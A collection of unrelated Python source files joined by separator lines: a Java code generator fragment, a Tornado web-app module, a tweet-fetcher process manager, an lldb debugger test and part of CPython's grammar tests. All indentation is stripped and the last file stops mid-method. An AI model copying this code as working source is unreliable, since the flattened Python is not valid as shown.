source += "\nimport org.json.JSONArray;"
source += "\nimport org.json.JSONException;"
source += "\nimport java.util.ArrayList;"
source += "\nimport java.util.Date;" # somehow date will not be added later - temporary static import
source += "\nimport " + self.dirPath.replace("/", ".") + ".*;"
source += "\n\nimport java.lang.IllegalArgumentException;\n"
stringImported = False
dateImported = False
regexImported = False
for prop in schemeObj.props:
baseTypes = schemeObj.getScheme(schemeObj.getScheme(prop.type_name).type_name).getBaseTypes()
if prop.base_type == "string" and stringImported is False:
source += "import java.lang.String;\n"
stringImported = True
if prop.base_type == "date" and dateImported is False:
source += "import java.util.Date;\n"
dateImported = True
for baseType in baseTypes:
if not schemeObj.hasScheme(baseType):
continue
else:
base = schemeObj.getScheme(baseType)
if len(base.regex) > 0 and regexImported is False:
source += "import java.util.regex.Pattern;\n"
regexImported = True
return source
def getConstructor(self, schemeObj):
source = self.indent(1) + "public " + self.cap(self.getClassName(schemeObj)) + "(JSONObject json) throws JSONException {"
if self.isChild:
source += self.indent(2) + "super(json);"
else:
source += self.indent(2) + "if (json == null) {"
source += self.indent(3) + "throw new IllegalArgumentException(\"JSONObject can't be null\");"
source += self.indent(2) + "}"
for prop in schemeObj.props:
source += self.getMethod(schemeObj, prop)
source += self.indent(1) + "}\n"
return source
### helper methods
def cap(self, name):
return name[0].capitalize() + name[1:]
def low(self, name):
return name[0].lower() + name[1:]
def indent(self, size):
i = 0
indent = "\n"
while i < size:
indent += " "
i += 1
return indent
def convertToJavaType(self, objCType):
if objCType == "number":
return "double"
elif objCType == "any":
return "Object"
elif objCType == "data":
return "byte"
elif objCType == "string":
return "String"
elif objCType == "date":
return "Date"
else:
return objCType
def isNatural(self, objectType):
objectType = self.convertToJavaType(objectType)
return objectType in self.naturalList
def getDefaultValue(self, type):
typeName = self.low(self.convertToJavaType(type))
if typeName == "double":
return 0
elif typeName == "boolean":
return "false"
return "null"
def addOrIgnoreMemberVariable(self, visibility, type, name):
newVariable = visibility + " " + type + " " + name + ""
if not newVariable in self.memberVariables.split("\n"):
self.memberVariables += newVariable + "\n"
def createMethodHead(self, visibility, returnType, name, parameter = ""):
return self.indent(1) + visibility + " " + returnType + " " + name + "(" + parameter + ") {"
def createSetter(self, variableString):
elements = variableString.split(" ")
if len(elements) == 3:
source = self.createMethodHead("public", "void", "set" + self.cap(elements[2]), elements[1] + " " + self.low(elements[2]))
source += self.indent(2) + "this." + elements[2] + " = " + self.low(elements[2]) + ";"
source += self.indent(1) + "}\n"
return source
return ""
def createGetter(self, variableString):
elements = variableString.split(" ")
if len(elements) == 3:
source = self.createMethodHead("public", elements[1], "get" + self.cap(elements[2]))
source += self.indent(2) + "return " + elements[2] + ";"
source += self.indent(1) + "}\n"
return source
return ""
def getClassName(self, schemeObj):
if self.isAbstract is True:
return "Abstract" + schemeObj.getClassName()
else:
return schemeObj.getClassName()
def getVariableName(self, name):
if name in ["private", "protected", "public", "class", "abstract", "final", "static"]:
return self.projectPrefix + self.cap(name)
return name
|
|
#!/usr/bin/env python
# encoding: utf-8
import json
import logging
import tornado.web
import tornado.options
from jinja2 import Environment, FileSystemLoader
from workin.conf import settings
from workin.middleware import MiddlewareManager
from workin.mixins.flash_message import FlashMessageMixin
from workin.mixins.jinja2 import Jinja2Mixin
from workin.session import Session
from workin.utils import importlib
from workin.routes import Route
class Application(tornado.web.Application):
db = None
session_engine = None
jinja_env = None
handlers = []
context_processors = []
def __init__(self, settings_module):
settings.configure(settings_module, True)
self.settings = settings.to_dict()
self._setup_extensions()
self._setup_session_engine()
self._setup_database_engine()
self._setup_template_loaders()
self._setup_installed_apps()
self._setup_context_processors()
tornado.web.Application.__init__(self, handlers=self.handlers,
**self.settings)
# Due to middleware run_init_hooks will call Application, so execute
# this at last.
self._setup_middlewares()
def __call__(self, request):
try:
self.middleware_manager.run_call_hooks(request)
handler = tornado.web.Application.__call__(self, request)
self.middleware_manager.run_endcall_hooks(handler)
except Exception, e:
logging.error(e)
raise
def _setup_middlewares(self):
self.middleware_manager = MiddlewareManager(**self.settings)
self.middleware_manager.run_init_hooks(self)
def _setup_context_processors(self):
# load context processors
processors = self.settings.get('context_processors', [])
self.context_processors = [importlib.load_class(x) for x in set(processors)]
def _setup_database_engine(self):
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from workin.database import Base
engine_url = self.settings['sqlalchemy_engine_url']
engine_kwargs = self.settings['sqlalchemy_engine_kwargs']
if not engine_url:
return
self.engine = create_engine(engine_url, **engine_kwargs)
self.db = scoped_session(sessionmaker(bind=self.engine))
Base.metadata.create_all(bind=self.engine)
def _setup_session_engine(self):
if 'session_engine' in self.settings:
engine = importlib.load_class(self.settings['session_engine'])
self.session_engine = engine(self.settings["session_secret"],
self.settings["session_options"],
self.settings["session_timeout"],
self.settings["session_cookie_domain"])
def _setup_template_loaders(self):
if "template_loader" in self.settings:
loader = self.settings['template_loader']
else:
loader = FileSystemLoader(self.settings['template_dirs'])
autoescape = bool(self.settings['autoescape'])
self.jinja_env = Environment(
loader=loader,
auto_reload=self.settings['debug'],
extensions=['workin.utils.jinja2htmlcompress.SelectiveHTMLCompress'],
autoescape=autoescape, )
def _setup_installed_apps(self):
"""Auto discovery handlers"""
if not self.settings.get('installed_apps'):
return
for app in self.settings['installed_apps']:
try:
importlib.import_module(app + '.handlers')
except ImportError, e:
logging.warn("No handlers found in app '%s':"
"%s" % (app, e))
try:
importlib.import_module(app + '.models')
except ImportError, e:
logging.warn("No models/handlers found in app '%s':"
"%s" % (app, e))
self.handlers.extend(Route.routes())
def _setup_extensions(self):
"""Auto discovery workin extensions"""
if not self.settings.get('workin_extensions'):
return
from workin.extensions import BaseDiscover, find_extensions
for ext in self.settings['workin_extensions']:
discovery = find_extensions(ext)
if isinstance(discovery, BaseDiscover):
logging.info("Install workin.exts.admin ...")
discovery.execute(self)
class BaseHandler(Jinja2Mixin, tornado.web.RequestHandler):
def _populate_context_from_ctxprocessors(self, context):
ctx = {}
ctx.update(context)
for ctx_processor in self.application.context_processors:
ctx.update(ctx_processor(self))
return ctx
def render_string(self, template_name, **context):
context = self._populate_context_from_ctxprocessors(context)
return super(BaseHandler, self).render_string(template_name, **context)
def prepare(self):
self.application.middleware_manager.run_request_hooks(self)
super(BaseHandler, self).prepare()
def finish(self, chunk=None):
self.application.middleware_manager.run_response_hooks(self)
super(BaseHandler, self).finish(chunk)
class RequestHandler(BaseHandler, FlashMessageMixin):
@property
def db(self):
return self.application.db
@property
def session(self):
if not hasattr(self, '_session'):
self._session = Session(self.application.session_engine, self)
return self._session
def on_finish(self):
if self.session: # and self.session.is_modified:
self.session.save()
# remove the sqla-session at the end of each request.
self.db.remove()
tornado.web.RequestHandler.on_finish(self)
def write_json(self, data=None, encoder=json.JSONEncoder, **kwargs):
if not data:
data = {}
self.set_header("Content-Type", "application/json")
self.write(json.dumps(data, cls=encoder, **kwargs))
def get_args(self, key, default=None, type=None):
if type == list:
if default is None:
default = []
return self.get_arguments(key, default)
value = self.get_argument(key, default)
if value and type:
try:
value = type(value)
except ValueError:
value = default
return value
@property
def is_xhr(self):
'''True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.'''
return self.request.headers.get('X-Requested-With', '') \
.lower() == 'xmlhttprequest'
|
|
import subprocess
import shlex
import glob
import threading
import os
import sys
import signal
from tworpus import settings, data_converter
import json
from session.models import Session
__manager = None
def getManager():
"""
Singleton wrapper for FetchersManager
"""
global __manager
if __manager is None:
__manager = FetchersManager()
return __manager
class FetcherProgressListener:
def onSuccess(self, values):
pass
def onError(self, values):
pass
def onFinish(self):
pass
def onCancel(self):
pass
class FetchersManager():
"""
Wrapper around dict.
Manages a list of running processes.
"""
def __init__(self):
self.fetchers = dict()
def add(self, fetcher, _id):
self.fetchers[str(_id)] = fetcher
def get(self, _id):
# if id in self.fetchers:
# self.fetchers[id]
# else:
# None
if str(_id) in self.fetchers:
return self.fetchers[str(_id)]
def remove(self, _id):
if str(_id) in self.fetchers:
fetcher = self.get(str(_id))
fetcher.cancel()
self.fetchers.pop(str(_id))
class TweetsFetcher():
"""
Fetches and merges tweets as XML file(s).
Process is done by jar file started through subprocess.
"""
def __init__(self, tweetsCsvFile, outputDir, tweetsPerXml):
self.__process = None
self.tweetsCsvFile = tweetsCsvFile
self.outputDir = outputDir
self.__cacheDir = settings.XML_CACHE_DIR
self.__canceled = False
self.__tweetsPerXml = tweetsPerXml
self.__updateListeners = []
def addListener(self, listener):
self.__updateListeners.append(listener)
def fetch(self):
thread = threading.Thread(target=self.__startJar)
thread.start()
def __startJar(self):
argsStr = "java -jar " + settings.TWORPUS_FETCHAR_JAR + \
" -input-file " + self.tweetsCsvFile + \
" -xml-cache-folder " + self.__cacheDir + \
" -xml-output-folder " + self.outputDir + \
" -split-after " + str(self.__tweetsPerXml)
# argsStr += " -override"
# argsStr += " -csv-no-title"
#setting the correct path for windows
argsStr = argsStr.replace("\\", "/")
args = shlex.split(argsStr) # creates args array for subprocess
self.__process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE)
while True:
line = self.__process.stdout.readline()
if not line:
break
values = self.parseDownloadProgressFromLine(line)
if values is not None:
if values["result"] == "success":
for listener in self.__updateListeners:
listener.onSuccess(values)
elif values["result"] == "error":
for listener in self.__updateListeners:
listener.onError(values)
sys.stdout.flush()
self.__process.communicate() # blocks subprocess until finish
self.__onFinish() if self.__canceled is not True else self.__onCancel()
def parseDownloadProgressFromLine(self, line):
"""
Receives a string/line from the command line output of tworpus_fetcher.jar
and parses relevant information like failed tweets, successful tweets and source location.
"""
line = str(line)
if not line.startswith("Fetch:"):
return None
line = line.strip("Fetch:").strip("\n")
values = line.split(",")
result = dict()
for val in values:
tupel = val.split("=")
result[str(tupel[0])] = tupel[1]
return result
def cancel(self):
"""
Terminates running tasks if there are any
"""
self.__canceled = True
if self.__process is not None:
os.kill(self.__process.pid, signal.SIGTERM)
else:
self.__onCancel()
# internal progress callbacks
def __onFinish(self):
self.__process = None
for listener in self.__updateListeners:
listener.onFinish()
def __onCancel(self):
for listener in self.__updateListeners:
listener.onCancel()
# end internal progress callbacks
class TweetProgressEventHandler(FetcherProgressListener):
def __init__(self, corpusid):
self.__corpusid = corpusid
self.__session = Session.objects.all().filter(id=corpusid).first()
self.__numTweetsFetched = 0
self.__numTweetsFailed = 0
self.__tweetsFetchedOnStart = self.__session.tweetsFetched
self.__tweetsFailedOnStart = self.__session.tweetsFailed
self.__lastProgressSent = 0
def onSuccess(self, values):
self.__numTweetsFetched += 1
if self.__numTweetsFetched > self.__tweetsFetchedOnStart:
self.__session.tweetsFetched = self.__numTweetsFetched
self.__onProgress(values)
def onError(self, values):
self.__numTweetsFailed += 1
if self.__numTweetsFailed > self.__tweetsFailedOnStart:
self.__session.tweetsFailed = self.__numTweetsFailed
self.__onProgress(values)
def onCancel(self):
self.__session.working = False
self.__session.completed = False
self.__session.save()
def onFinish(self):
from tworpus import tweet_converter
baseFolder = os.path.join(settings.BASE_PROJECT_DIR, self.__session.folder)
xmlFiles = glob.glob(os.path.join(baseFolder, "*.xml"))
for xmlFile in xmlFiles:
try:
# Run data converters if selected
converterIds = json.loads(self.__session.converters)
if converterIds.__len__() > 0:
newXmlFile = xmlFile + ".tmp.xml"
os.rename(xmlFile, newXmlFile)
app = tweet_converter.ConverterApp(newXmlFile, xmlFile)
converters = data_converter.get_converters_from_ids(converterIds)
for converter in converters:
class_name = converter["class_name"]
module_name = converter["module_name"]
package = converter["package"]
fullname = "converters." + package
mod = __import__(fullname, globals(), locals(), [module_name], -1)
converter_module = getattr(mod, module_name)
converter_class = getattr(converter_module, class_name)
app.register_converter(converter_class())
app.run()
except:
pass
xmlFiles = glob.glob(os.path.join(baseFolder, "*.tmp.xml"))
for xmlFile in xmlFiles:
os.remove(xmlFile)
self.__session.working = False
self.__session.completed = True
self.__session.save()
def __onProgress(self, values):
progress = (float(values["failed"]) + float(values["succeeded"])) / float(values["total"]) * 100
if progress > self.__session.progress:
self.__session.progress = progress
self.__session.save()
self.__lastProgressSent += 1
if self.__lastProgressSent is 10:
self.__lastProgressSent = 0
|
|
"""Test that hidden ivars in a shared library are visible from the main executable."""
import unittest2
import subprocess
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class HiddenIvarsTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// breakpoint1')
# The makefile names of the shared libraries as they appear in DYLIB_NAME.
# The names should have no loading "lib" or extension as they will be
# localized
self.shlib_names = ["InternalDefiner"]
@skipUnlessDarwin
@skipIf(
debug_info=no_match("dsym"),
bugnumber="This test requires a stripped binary and a dSYM")
@skipIfReproducer # FIXME: Unexpected packet during (passive) replay
def test_expr_stripped(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.expr(True)
@skipUnlessDarwin
@skipIfReproducer # FIXME: Unexpected packet during (passive) replay
def test_expr(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.expr(False)
@skipUnlessDarwin
@skipIf(
debug_info=no_match("dsym"),
bugnumber="This test requires a stripped binary and a dSYM")
def test_frame_variable_stripped(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.frame_var(True)
@skipUnlessDarwin
def test_frame_variable(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.frame_var(False)
@expectedFailure("rdar://18683637")
@skipUnlessDarwin
def test_frame_variable_across_modules(self):
if self.getArchitecture() == 'i386':
self.skipTest("requires modern objc runtime")
else:
self.build()
self.common_setup(False)
self.expect(
"frame variable k->bar",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 3"])
def common_setup(self, strip):
if strip:
exe = self.getBuildArtifact("stripped/a.out")
else:
exe = self.getBuildArtifact("a.out")
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get
# automatically uploaded
environment = self.registerSharedLibrariesWithTarget(
target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break inside the foo function which takes a bar_ptr argument.
lldbutil.run_break_set_by_file_and_line(
self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
def expr(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect(
"expression (j->_definer->foo)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 4"])
self.expect(
"expression (j->_definer->bar)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 5"])
if strip:
self.expect(
"expression *(j->_definer)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 4"])
else:
self.expect(
"expression *(j->_definer)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 4",
"bar = 5"])
self.expect("expression (k->foo)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 2"])
self.expect("expression (k->bar)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 3"])
self.expect(
"expression k.filteredDataSource",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
' = 0x',
'"2 elements"'])
if strip:
self.expect("expression *(k)", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 2", ' = 0x', '"2 elements"'])
else:
self.expect(
"expression *(k)",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
"bar = 3",
'_filteredDataSource = 0x',
'"2 elements"'])
def frame_var(self, strip):
self.common_setup(strip)
# This should display correctly.
self.expect(
"frame variable j->_definer->foo",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 4"])
if not strip:
self.expect(
"frame variable j->_definer->bar",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 5"])
if strip:
self.expect(
"frame variable *j->_definer",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo = 4"])
else:
self.expect(
"frame variable *j->_definer",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 4",
"bar = 5"])
self.expect("frame variable k->foo", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 2"])
self.expect(
"frame variable k->_filteredDataSource",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
' = 0x',
'"2 elements"'])
if strip:
self.expect(
"frame variable *k",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
'_filteredDataSource = 0x',
'"2 elements"'])
else:
self.expect(
"frame variable *k",
VARIABLES_DISPLAYED_CORRECTLY,
substrs=[
"foo = 2",
"bar = 3",
'_filteredDataSource = 0x',
'"2 elements"'])
|
|
# Python test set -- part 1, grammar.
# This just tests whether the parser accepts them all.
from test.support import run_unittest, check_syntax_error
import unittest
import sys
# testing import *
from sys import *
class TokenTests(unittest.TestCase):
def testBackslash(self):
# Backslash means line continuation:
x = 1 \
+ 1
self.assertEqual(x, 2, 'backslash for line continuation')
# Backslash does not means continuation in comments :\
x = 0
self.assertEqual(x, 0, 'backslash ending comment')
def testPlainIntegers(self):
self.assertEqual(type(000), type(0))
self.assertEqual(0xff, 255)
self.assertEqual(0o377, 255)
self.assertEqual(2147483647, 0o17777777777)
self.assertEqual(0b1001, 9)
# "0x" is not a valid literal
self.assertRaises(SyntaxError, eval, "0x")
from sys import maxsize
if maxsize == 2147483647:
self.assertEqual(-2147483647-1, -0o20000000000)
# XXX -2147483648
self.assertTrue(0o37777777777 > 0)
self.assertTrue(0xffffffff > 0)
self.assertTrue(0b1111111111111111111111111111111 > 0)
for s in ('2147483648', '0o40000000000', '0x100000000',
'0b10000000000000000000000000000000'):
try:
x = eval(s)
except OverflowError:
self.fail("OverflowError on huge integer literal %r" % s)
elif maxsize == 9223372036854775807:
self.assertEqual(-9223372036854775807-1, -0o1000000000000000000000)
self.assertTrue(0o1777777777777777777777 > 0)
self.assertTrue(0xffffffffffffffff > 0)
self.assertTrue(0b11111111111111111111111111111111111111111111111111111111111111 > 0)
for s in '9223372036854775808', '0o2000000000000000000000', \
'0x10000000000000000', \
'0b100000000000000000000000000000000000000000000000000000000000000':
try:
x = eval(s)
except OverflowError:
self.fail("OverflowError on huge integer literal %r" % s)
else:
self.fail('Weird maxsize value %r' % maxsize)
def testLongIntegers(self):
x = 0
x = 0xffffffffffffffff
x = 0Xffffffffffffffff
x = 0o77777777777777777
x = 0O77777777777777777
x = 123456789012345678901234567890
x = 0b100000000000000000000000000000000000000000000000000000000000000000000
x = 0B111111111111111111111111111111111111111111111111111111111111111111111
def testFloats(self):
x = 3.14
x = 314.
x = 0.314
# XXX x = 000.314
x = .314
x = 3e14
x = 3E14
x = 3e-14
x = 3e+14
x = 3.e14
x = .3e14
x = 3.1e4
def testStringLiterals(self):
x = ''; y = ""; self.assertTrue(len(x) == 0 and x == y)
x = '\''; y = "'"; self.assertTrue(len(x) == 1 and x == y and ord(x) == 39)
x = '"'; y = "\""; self.assertTrue(len(x) == 1 and x == y and ord(x) == 34)
x = "doesn't \"shrink\" does it"
y = 'doesn\'t "shrink" does it'
self.assertTrue(len(x) == 24 and x == y)
x = "does \"shrink\" doesn't it"
y = 'does "shrink" doesn\'t it'
self.assertTrue(len(x) == 24 and x == y)
x = """
The "quick"
brown fox
jumps over
the 'lazy' dog.
"""
y = '\nThe "quick"\nbrown fox\njumps over\nthe \'lazy\' dog.\n'
self.assertEqual(x, y)
y = '''
The "quick"
brown fox
jumps over
the 'lazy' dog.
'''
self.assertEqual(x, y)
y = "\n\
The \"quick\"\n\
brown fox\n\
jumps over\n\
the 'lazy' dog.\n\
"
self.assertEqual(x, y)
y = '\n\
The \"quick\"\n\
brown fox\n\
jumps over\n\
the \'lazy\' dog.\n\
'
self.assertEqual(x, y)
def testEllipsis(self):
x = ...
self.assertTrue(x is Ellipsis)
self.assertRaises(SyntaxError, eval, ".. .")
class GrammarTests(unittest.TestCase):
# single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
# XXX can't test in a script -- this rule is only used when interactive
# file_input: (NEWLINE | stmt)* ENDMARKER
# Being tested as this very moment this very module
# expr_input: testlist NEWLINE
# XXX Hard to test -- used only in calls to input()
def testEvalInput(self):
# testlist ENDMARKER
x = eval('1, 0 or 1')
def testFuncdef(self):
### [decorators] 'def' NAME parameters ['->' test] ':' suite
### decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
### decorators: decorator+
### parameters: '(' [typedargslist] ')'
### typedargslist: ((tfpdef ['=' test] ',')*
### ('*' [tfpdef] (',' tfpdef ['=' test])* [',' '**' tfpdef] | '**' tfpdef)
### | tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
### tfpdef: NAME [':' test]
### varargslist: ((vfpdef ['=' test] ',')*
### ('*' [vfpdef] (',' vfpdef ['=' test])* [',' '**' vfpdef] | '**' vfpdef)
### | vfpdef ['=' test] (',' vfpdef ['=' test])* [','])
### vfpdef: NAME
def f1(): pass
f1()
f1(*())
f1(*(), **{})
def f2(one_argument): pass
def f3(two, arguments): pass
self.assertEqual(f2.__code__.co_varnames, ('one_argument',))
self.assertEqual(f3.__code__.co_varnames, ('two', 'arguments'))
def a1(one_arg,): pass
def a2(two, args,): pass
def v0(*rest): pass
def v1(a, *rest): pass
def v2(a, b, *rest): pass
f1()
f2(1)
f2(1,)
f3(1, 2)
f3(1, 2,)
v0()
v0(1)
v0(1,)
v0(1,2)
v0(1,2,3,4,5,6,7,8,9,0)
v1(1)
v1(1,)
v1(1,2)
v1(1,2,3)
v1(1,2,3,4,5,6,7,8,9,0)
v2(1,2)
v2(1,2,3)
v2(1,2,3,4)
v2(1,2,3,4,5,6,7,8,9,0)
def d01(a=1): pass
d01()
d01(1)
d01(*(1,))
d01(**{'a':2})
def d11(a, b=1): pass
d11(1)
d11(1, 2)
d11(1, **{'b':2})
def d21(a, b, c=1): pass
d21(1, 2)
d21(1, 2, 3)
d21(*(1, 2, 3))
d21(1, *(2, 3))
d21(1, 2, *(3,))
d21(1, 2, **{'c':3})
def d02(a=1, b=2): pass
d02()
d02(1)
d02(1, 2)
d02(*(1, 2))
d02(1, *(2,))
d02(1, **{'b':2})
d02(**{'a': 1, 'b': 2})
def d12(a, b=1, c=2): pass
d12(1)
d12(1, 2)
d12(1, 2, 3)
def d22(a, b, c=1, d=2): pass
d22(1, 2)
d22(1, 2, 3)
d22(1, 2, 3, 4)
def d01v(a=1, *rest): pass
d01v()
d01v(1)
d01v(1, 2)
d01v(*(1, 2, 3, 4))
d01v(*(1,))
d01v(**{'a':2})
def d11v(a, b=1, *rest): pass
d11v(1)
d11v(1, 2)
d11v(1, 2, 3)
def d21v(a, b, c=1, *rest): pass
d21v(1, 2)
d21v(1, 2, 3)
d21v(1, 2, 3, 4)
d21v(*(1, 2, 3, 4))
d21v(1, 2, **{'c': 3})
def d02v(a=1, b=2, *rest): pass
d02v()
d02v(1)
d02v(1, 2)
d02v(1, 2, 3)
d02v(1, *(2, 3, 4))
d02v(**{'a': 1, 'b': 2})
def d12v(a, b=1, c=2, *rest): pass
d12v(1)
d12v(1, 2)
d12v(1, 2, 3)
d12v(1, 2, 3, 4)
d12v(*(1, 2, 3, 4))
d12v(1, 2, *(3, 4, 5))
d12v(1, *(2,), **{'c': 3})
def d22v(a, b, c=1, d=2, *rest): pass
d22v(1, 2)
d22v(1, 2, 3)
d22v(1, 2, 3, 4)
d22v(1, 2, 3, 4, 5)
d22v(*(1, 2, 3, 4))
d22v(1, 2, *(3, 4, 5))
d22v(1, *(2, 3), **{'d': 4})
# keyword argument type tests
try:
str('x', **{b'foo':1 })
except TypeError:
pass
else:
self.fail('Bytes should not work as keyword argument names')
# keyword only argument tests
def pos0key1(*, key): return key
pos0key1(key=100)
def pos2key2(p1, p2, *, k1, k2=100): return p1,p2,k1,k2
pos2key2(1, 2, k1=100)
pos2key2(1, 2, k1=100, k2=200)
pos2key2(1, 2, k2=100, k1=200)
def pos2key2dict(p1, p2, *, k1=100, k2, **kwarg): return p1,p2,k1,k2,kwarg
pos2key2dict(1,2,k2=100,tokwarg1=100,tokwarg2=200)
pos2key2dict(1,2,tokwarg1=100,tokwarg2=200, k2=100)
# keyword arguments after *arglist
def f(*args, **kwargs):
return args, kwargs
self.assertEqual(f(1, x=2, *[3, 4], y=5), ((1, 3, 4),
{'x':2, 'y':5}))
self.assertRaises(SyntaxError, eval, "f(1, *(2,3), 4)")
self.assertRaises(SyntaxError, eval, "f(1, x=2, *(3,4), x=5)")
# argument annotation tests
def f(x) -> list: pass
self.assertEqual(f.__annotations__, {'return': list})
def f(x:int): pass
self.assertEqual(f.__annotations__, {'x': int})
def f(*x:str): pass
self.assertEqual(f.__annotations__, {'x': str})
def f(**x:float): pass
self.assertEqual(f.__annotations__, {'x': float})
def f(x, y:1+2): pass
self.assertEqual(f.__annotations__, {'y': 3})
def f(a, b:1, c:2, d): pass
self.assertEqual(f.__annotations__, {'b': 1, 'c': 2})
def f(a, b:1, c:2, d, e:3=4, f=5, *g:6): pass
self.assertEqual(f.__annotations__,
{'b': 1, 'c': 2, 'e': 3, 'g': 6})
def f(a, b:1, c:2, d, e:3=4, f=5, *g:6, h:7, i=8, j:9=10,
**k:11) -> 12: pass
self.assertEqual(f.__annotations__,
{'b': 1, 'c': 2, 'e': 3, 'g': 6, 'h': 7, 'j': 9,
'k': 11, 'return': 12})
# Check for SF Bug #1697248 - mixing decorators and a return annotation
def null(x): return x
@null
def f(x) -> list: pass
self.assertEqual(f.__annotations__, {'return': list})
# test MAKE_CLOSURE with a variety of oparg's
closure = 1
def f(): return closure
def f(x=1): return closure
def f(*, k=1): return closure
def f() -> int: return closure
# Check ast errors in *args and *kwargs
check_syntax_error(self, "f(*g(1=2))")
check_syntax_error(self, "f(**g(1=2))")
def testLambdef(self):
### lambdef: 'lambda' [varargslist] ':' test
l1 = lambda : 0
self.assertEqual(l1(), 0)
l2 = lambda : a[d] # XXX just testing the expression
l3 = lambda : [2 < x for x in [-1, 3, 0]]
self.assertEqual(l3(), [0, 1, 0])
l4 = lambda x = lambda y = lambda z=1 : z : y() : x()
self.assertEqual(l4(), 1)
l5 = lambda x, y, z=2: x + y + z
self.assertEqual(l5(1, 2), 5)
self.assertEqual(l5(1, 2, 3), 6)
check_syntax_error(self, "lambda x: x = 2")
check_syntax_error(self, "lambda (None,): None")
l6 = lambda x, y, *, k=20: x+y+k
self.assertEqual(l6(1,2), 1+2+20)
self.assertEqual(l6(1,2,k=10), 1+2+10)
### stmt: simple_stmt | compound_stmt
# Tested below
def testSimpleStmt(self):
### simple_stmt: small_stmt (';' small_stmt)* [';']
x = 1; pass; del x
def foo():
# verify statements that end with semi-colons
x = 1; pass; del x;
foo()
### small_stmt: expr_stmt | pass_stmt | del_stmt | flow_stmt | import_stmt | global_stmt | access_stmt
# Tested below
def testExprStmt(self):
# (exprlist '=')* exprlist
1
1, 2, 3
x = 1
x = 1, 2, 3
x = y = z = 1, 2, 3
x, y, z = 1, 2, 3
abc = a, b, c = x, y, z = xyz = 1, 2, (3, 4)
check_syntax_error(self, "x + 1 = 1")
check_syntax_error(self, "a + 1 = b + 2")
def testDelStmt(self):
# 'del' exprlist
abc = [1,2,3]
x, y, z = abc
xyz = x, y, z
del abc
del x, y, (z, xyz)
def testPassStmt(self):
# 'pass'
pass
# flow_stmt: break_stmt | continue_stmt | return_stmt | raise_stmt
# Tested below
def testBreakStmt(self):
# 'break'
while 1: break
def testContinueStmt(self):
# 'continue'
i = 1
while i: i = 0; continue
msg = ""
while not msg:
msg = "ok"
try:
continue
msg = "continue failed to continue inside try"
except:
msg = "continue inside try called except block"
if msg != "ok":
self.fail(msg)
msg = ""
while not msg:
msg = "finally block not called"
try:
continue
finally:
msg = "ok"
if msg != "ok":
self.fail(msg)
def test_break_continue_loop(self):
# This test warrants an explanation. It is a test specifically for SF bugs
# #463359 and #462937. The bug is that a 'break' statement executed or
# exception raised inside a try/except inside a loop, *after* a continue
# statement has been executed in that loop, will cause the wrong number of
# arguments to be popped off the stack and the instruction pointer reset to
# a very small number (usually 0.) Because of this, the following test
# *must* written as a function, and the tracking vars *must* be function
# arguments with default values. Otherwise, the test will loop and loop.
def test_inner(extra_burning_oil = 1, count=0):
big_hippo = 2
while big_hippo:
count += 1
try:
if extra_burning_oil and big_hippo == 1:
extra_burning_oil -= 1
break
big_hippo -= 1
continue
except:
raise
if count > 2 or big_hippo != 1:
self.fail("continue then break in try/except in loop broken!")
test_inner()
def testReturn(self):
# 'return' [testlist]
def g1(): return
def g2(): return 1
g1()
x = g2()
check_syntax_error(self, "class foo:return 1")
def testYield(self):
check_syntax_error(self, "class foo:yield 1")
def testRaise(self):
# 'raise' test [',' test]
try: raise RuntimeError('just testing')
except RuntimeError: pass
try: raise KeyboardInterrupt
except KeyboardInterrupt: pass
def testImport(self):
# 'import' dotted_as_names
import sys
import time, sys
